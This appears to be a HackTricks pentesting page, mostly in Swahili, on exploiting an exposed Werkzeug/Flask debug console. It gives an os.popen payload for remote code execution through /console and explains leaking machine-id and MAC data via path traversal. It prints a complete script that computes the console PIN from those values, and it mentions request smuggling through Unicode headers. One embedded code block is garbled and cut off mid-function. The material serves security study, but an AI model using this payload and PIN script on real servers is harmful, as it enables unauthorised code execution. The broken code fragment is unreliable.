Werkzeug / Flask Debug

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

Mipangilio inayopatikana mara moja kwa ajili ya tathmini ya udhaifu & upimaji wa pen. Endesha pentest kamili kutoka mahali popote na zana 20+ & vipengele vinavyotoka kwenye recon hadi ripoti. Hatubadilishi wapimaji wa pentest - tunatengeneza zana maalum, moduli za kugundua & kutumia ili kuwapa muda wa kuchimba zaidi, kufungua shells, na kufurahia.

Pentest-Tools.com | 25+ Online Penetration Testing ToolsPentest-Tools.com

Console RCE

Ikiwa debug imewashwa unaweza kujaribu kufikia /console na kupata RCE.

__import__('os').popen('whoami').read();

Kuna pia exploits kadhaa mtandaoni kama hii au moja katika metasploit.

Pin Protected - Path Traversal

Katika baadhi ya matukio, /console endpoint itakuwa imehifadhiwa na pin. Ikiwa una file traversal vulnerability, unaweza kuvuja taarifa zote muhimu za kuunda pin hiyo.

Werkzeug Console PIN Exploit

Lazimisha ukurasa wa kosa la debug katika programu ili kuona hii:

The console is locked and needs to be unlocked by entering the PIN.
You can find the PIN printed out on the standard output of your
shell that runs the server

A message regarding the "console locked" scenario is encountered when attempting to access Werkzeug's debug interface, indicating a requirement for a PIN to unlock the console. The suggestion is made to exploit the console PIN by analyzing the PIN generation algorithm in Werkzeug’s debug initialization file (__init__.py). The PIN generation mechanism can be studied from the Werkzeug source code repository, though it is advised to procure the actual server code via a file traversal vulnerability due to potential version discrepancies.

To exploit the console PIN, two sets of variables, probably_public_bits and private_bits, are needed:

`probably_public_bits`

username: Inahusu mtumiaji aliyeanzisha kikao cha Flask.
modname: Kawaida hupewa jina flask.app.
getattr(app, '__name__', getattr(app.__class__, '__name__')): Kawaida hupelekea Flask.
getattr(mod, '__file__', None): Inawakilisha njia kamili ya app.py ndani ya directory ya Flask (mfano, /usr/local/lib/python3.5/dist-packages/flask/app.py). Ikiwa app.py haitumiki, jaribu app.pyc.

`private_bits`

uuid.getnode(): Inapata anwani ya MAC ya mashine ya sasa, huku str(uuid.getnode()) ikitafsiri kuwa katika muundo wa desimali.
Ili kubaini anwani ya MAC ya server, mtu lazima atambue interface ya mtandao inayotumika na app (mfano, ens3). Katika hali za kutokuwa na uhakika, leak /proc/net/arp ili kupata kitambulisho cha kifaa, kisha toa anwani ya MAC kutoka /sys/class/net/<device id>/address.
Kubadilisha anwani ya MAC ya hexadecimal kuwa desimali kunaweza kufanywa kama inavyoonyeshwa hapa chini:

# Example MAC address: 56:00:02:7a:23:ac
>>> print(0x5600027a23ac)
94558041547692

get_machine_id(): Inachanganya data kutoka /etc/machine-id au /proc/sys/kernel/random/boot_id na mstari wa kwanza wa /proc/self/cgroup baada ya slash ya mwisho (/).

Code for `get_machine_id()`

```python def get_machine_id() -> t.Optional[t.Union[str, bytes]]: global _machine_id

if _machine_id is not None: return _machine_id

def _generate() -> t.Optional[t.Union[str, bytes]]: linux = b""

machine-id is stable across boots, boot_id is not.

for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id": try: with open(filename, "rb") as f: value = f.readline().strip() except OSError: continue

if value: linux += value break

information. This is used outside containers too but should be

relatively stable across boots.

try: with open("/proc/self/cgroup", "rb") as f: linux += f.readline().strip().rpartition(b"/")[2] except OSError: pass

if linux: return linux

On OS X, use ioreg to get the computer's serial number.

try:

</details>

Baada ya kukusanya data zote muhimu, skripti ya exploit inaweza kutekelezwa ili kuunda PIN ya konsoli ya Werkzeug:

Baada ya kukusanya data zote muhimu, skripti ya exploit inaweza kutekelezwa ili kuunda PIN ya konsoli ya Werkzeug. Skripti inatumia `probably_public_bits` na `private_bits` zilizokusanywa ili kuunda hash, ambayo kisha inapitia mchakato zaidi ili kutoa PIN ya mwisho. Hapa chini kuna msimbo wa Python wa kutekeleza mchakato huu:
```python
import hashlib
from itertools import chain
probably_public_bits = [
'web3_user',  # username
'flask.app',  # modname
'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.5/dist-packages/flask/app.py'  # getattr(mod, '__file__', None),
]

private_bits = [
'279275995014060',  # str(uuid.getnode()),  /sys/class/net/ens33/address
'd4e6cb65d59544f3331ea0425dc555a1'  # get_machine_id(), /etc/machine-id
]

# h = hashlib.md5()  # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
# h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num

print(rv)

This script produces the PIN by hashing the concatenated bits, adding specific salts (cookiesalt and pinsalt), and formatting the output. It's important to note that the actual values for probably_public_bits and private_bits need to be accurately obtained from the target system to ensure the generated PIN matches the one expected by the Werkzeug console.

Ikiwa uko kwenye toleo la zamani la Werkzeug, jaribu kubadilisha algorithms ya hashing kuwa md5 badala ya sha1.

Werkzeug Unicode chars

Kama ilivyoonekana katika tatizo hili, Werkzeug haifungi ombi lenye wahusika wa Unicode katika vichwa. Na kama ilivyoelezwa katika andika hii, hii inaweza kusababisha udhaifu wa CL.0 Request Smuggling.

Hii ni kwa sababu, Katika Werkzeug inawezekana kutuma wahusika wengine wa Unicode na itafanya seva kuvunjika. Hata hivyo, ikiwa muunganisho wa HTTP ulianzishwa na kichwa Connection: keep-alive, mwili wa ombi hautasomwa na muunganisho utaendelea kuwa wazi, hivyo mwili wa ombi utachukuliwa kama ombio inayofuata ya HTTP.

Automated Exploitation

References

Instantly available setup for vulnerability assessment & penetration testing. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)